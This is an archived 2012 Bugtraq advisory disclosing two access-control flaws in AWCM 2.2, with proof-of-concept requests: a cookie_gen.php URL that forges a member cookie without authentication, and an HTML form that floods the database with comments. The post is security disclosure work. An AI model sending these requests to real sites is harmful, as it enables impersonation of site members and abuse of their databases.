lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CADiLk_O4Jw7qxwf=1j9pLeC2BJUh=OqKg26dGw++jG3t2x=wBA@mail.gmail.com>
Date: Thu, 8 Nov 2012 09:18:23 -0600
From: Sooel Postman <sonpostman@...il.com>
To: bugtraq@...urityfocus.com
Subject: Vulnerability Report on AWCM 2.2

Vulnerability Report AWCM 2.2

CVE-Candidate-ID: CVE-2012-2437, CVE-2012-2438
Issue: Access Control Bug in AWCM 2.2, Anyone can build the cookie and inserts
DB records.
Author: Sooel Son [sonpostman (at) gmail (dot) com]
Source Code: http://sourceforge.net/projects/awcm/

1. Details: CVE-2012-2437
        Without going through an authentication procedure, anyone can
forge a cookie, the
pairs of key and value.

        Proof of Concept Code: Initiate the following URL request.
        http://targethost/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
        ex) http://targethost/awcm/cookie_gen.php?
name=awcm_member&content=123456

2. Details CVE-2012-2438
        There is no access control protection for adversaries to
insert millions of
        comment records on the database on show_video.php and topic.php.

        Proof of Concept Code:
        [form action=\"http://targethost/awcm/show_video.php?coment=exploit\"
        method=\"post\"]
          [input type=\"hidden\" name=\"coment\" value=\'insert
uninvited comments 2\' /]
          [input type=\"submit\" value=\"Submit\"]
        </form>

##########################
Vendor Notification
* Nov 5th: Acknowledge the vendors, but no responses.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ